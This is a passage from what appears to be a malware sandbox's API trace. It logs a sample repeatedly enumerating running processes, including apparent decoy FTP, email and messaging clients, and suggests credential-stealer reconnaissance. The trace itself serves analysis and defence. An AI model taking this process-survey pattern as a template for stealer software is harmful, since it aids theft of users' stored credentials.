th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0204.398] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0204.401] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0204.404] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0204.407] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0204.410] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0204.412] CloseHandle (hObject=0x20d4) returned 1 [0204.412] Sleep (dwMilliseconds=0x64) [0204.534] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20f0 [0204.560] Process32First (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.562] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0204.564] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0204.568] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0204.570] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0204.572] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0204.574] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0204.576] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0204.616] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0204.619] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.620] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.622] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0204.624] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.626] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.629] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.632] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.633] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.635] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.637] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.640] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0204.642] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0204.643] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.645] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0204.647] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.649] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0204.715] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0204.717] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0204.719] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0204.721] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0204.724] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0204.726] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.727] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0204.729] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0204.731] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0204.733] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.735] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0204.737] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0204.739] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0204.820] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0204.827] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0204.829] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0204.831] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0204.868] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0204.870] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0204.872] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0204.874] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0204.877] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0204.879] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0204.881] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0204.883] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0204.885] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0204.887] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0204.889] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0204.891] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0204.893] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0204.895] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0204.897] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0204.899] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0204.928] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0204.931] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0204.934] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0204.936] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0204.939] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0204.941] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0204.944] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0204.946] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0204.949] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0204.951] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0204.953] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0204.955] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0204.957] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0204.960] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0204.962] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0205.051] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0205.086] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0205.089] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0205.092] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0205.095] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0205.098] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, 